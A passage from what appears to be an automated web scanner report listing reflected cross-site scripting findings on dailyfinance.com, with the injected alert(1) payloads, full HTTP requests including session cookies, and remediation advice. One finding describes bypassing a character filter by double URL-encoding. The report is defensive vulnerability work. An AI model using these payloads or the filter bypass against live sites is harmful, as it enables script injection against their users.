GET /story/son-of-former-enron-ceo-jeffrey-skilling-found-dead-in-apartment/19828738/?1cc17"><script>alert(1)</script>e301719d8f9=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3d0"><script>alert(1)</script>92573319bd0 was submitted in the icid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?icid=videoModule|face-off-on-stocks-disney-viacom-time-warner-video/19823676/9e3d0"><script>alert(1)</script>92573319bd0 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b919a"-alert(1)-"e05604ad8fb was submitted in the icid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?icid=videoModule|face-off-on-stocks-disney-viacom-time-warner-video/19823676/b919a"-alert(1)-"e05604ad8fb HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... ; s_265.prop12="http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?icid=videoModule|face-off-on-stocks-disney-viacom-time-warner-video/19823676/b919a"-alert(1)-"e05604ad8fb"; s_265.prop21="";
s_265.prop9="bsd:19823676";
s_265.prop19="Dan Burrows";
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElem ...[SNIP]...
1.466. http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de5b"><script>alert(1)</script>396c399afc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?1de5b"><script>alert(1)</script>396c399afc6=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?1de5b"><script>alert(1)</script>396c399afc6=1" rel="nofollow"> ...[SNIP]...
1.467. http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd86b"-alert(1)-"9ca6721938c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?cd86b"-alert(1)-"9ca6721938c=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEl ...[SNIP]...
1.468. http://www.dailyfinance.com/story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc759"><script>alert(1)</script>59711addbf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/?fc759"><script>alert(1)</script>59711addbf2=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/?fc759"><script>alert(1)</script>59711addbf2=1" rel="nofollow"> ...[SNIP]...
1.469. http://www.dailyfinance.com/story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afcd4"-alert(1)-"9e4fe1dd09a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/?afcd4"-alert(1)-"9e4fe1dd09a=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createE ...[SNIP]...
1.470. http://www.dailyfinance.com/story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb969"-alert(1)-"4b39461a756 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/?cb969"-alert(1)-"4b39461a756=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createE ...[SNIP]...
1.471. http://www.dailyfinance.com/story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4b67"><script>alert(1)</script>2e6423ca985 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/?d4b67"><script>alert(1)</script>2e6423ca985=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/?d4b67"><script>alert(1)</script>2e6423ca985=1" rel="nofollow"> ...[SNIP]...
1.472. http://www.dailyfinance.com/story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b947f"><script>alert(1)</script>b231b87fb8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/?b947f"><script>alert(1)</script>b231b87fb8b=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/?b947f"><script>alert(1)</script>b231b87fb8b=1" rel="nofollow"> ...[SNIP]...
1.473. http://www.dailyfinance.com/story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bc42"-alert(1)-"92c75e4f0b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/?1bc42"-alert(1)-"92c75e4f0b5=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.474. http://www.dailyfinance.com/story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74642"><script>alert(1)</script>82d9cb7d101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/?74642"><script>alert(1)</script>82d9cb7d101=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/?74642"><script>alert(1)</script>82d9cb7d101=1" rel="nofollow"> ...[SNIP]...
1.475. http://www.dailyfinance.com/story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 951b9"-alert(1)-"3e51c845def was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/?951b9"-alert(1)-"3e51c845def=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.476. http://www.dailyfinance.com/story/wall-street-pay-versus-most-americans/19825075/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99f08"-alert(1)-"76dd7b0a465 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/wall-street-pay-versus-most-americans/19825075/?99f08"-alert(1)-"76dd7b0a465=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEl ...[SNIP]...
1.477. http://www.dailyfinance.com/story/wall-street-pay-versus-most-americans/19825075/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fff9"><script>alert(1)</script>082b41fd256 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/wall-street-pay-versus-most-americans/19825075/?3fff9"><script>alert(1)</script>082b41fd256=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/wall-street-pay-versus-most-americans/19825075/?3fff9"><script>alert(1)</script>082b41fd256=1" rel="nofollow"> ...[SNIP]...
1.478. http://www.dailyfinance.com/story/will-you-be-my-financially-responsible-valentine/19829277/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5515c"><script>alert(1)</script>b180374e1cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/will-you-be-my-financially-responsible-valentine/19829277/?5515c"><script>alert(1)</script>b180374e1cf=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/will-you-be-my-financially-responsible-valentine/19829277/?5515c"><script>alert(1)</script>b180374e1cf=1" rel="nofollow"> ...[SNIP]...
1.479. http://www.dailyfinance.com/story/will-you-be-my-financially-responsible-valentine/19829277/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65c49"-alert(1)-"788e2191648 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/will-you-be-my-financially-responsible-valentine/19829277/?65c49"-alert(1)-"788e2191648=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83743"><img%20src%3da%20onerror%3dalert(1)>4edc513783e was submitted in the REST URL parameter 2. This input was echoed as 83743"><img src=a onerror=alert(1)>4edc513783e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/madoff83743"><img%20src%3da%20onerror%3dalert(1)>4edc513783e/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 250ff%2522%253b66d481f60c1 was submitted in the REST URL parameter 2. This input was echoed as 250ff";66d481f60c1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/madoff250ff%2522%253b66d481f60c1/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.482. http://www.dailyfinance.com/tag/madoff/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/tag/madoff/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f1b0"-alert(1)-"c5b87a5d860 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/madoff/?5f1b0"-alert(1)-"c5b87a5d860=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.483. http://www.dailyfinance.com/to-go/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/to-go/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69fff"-alert(1)-"73c848d5aee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
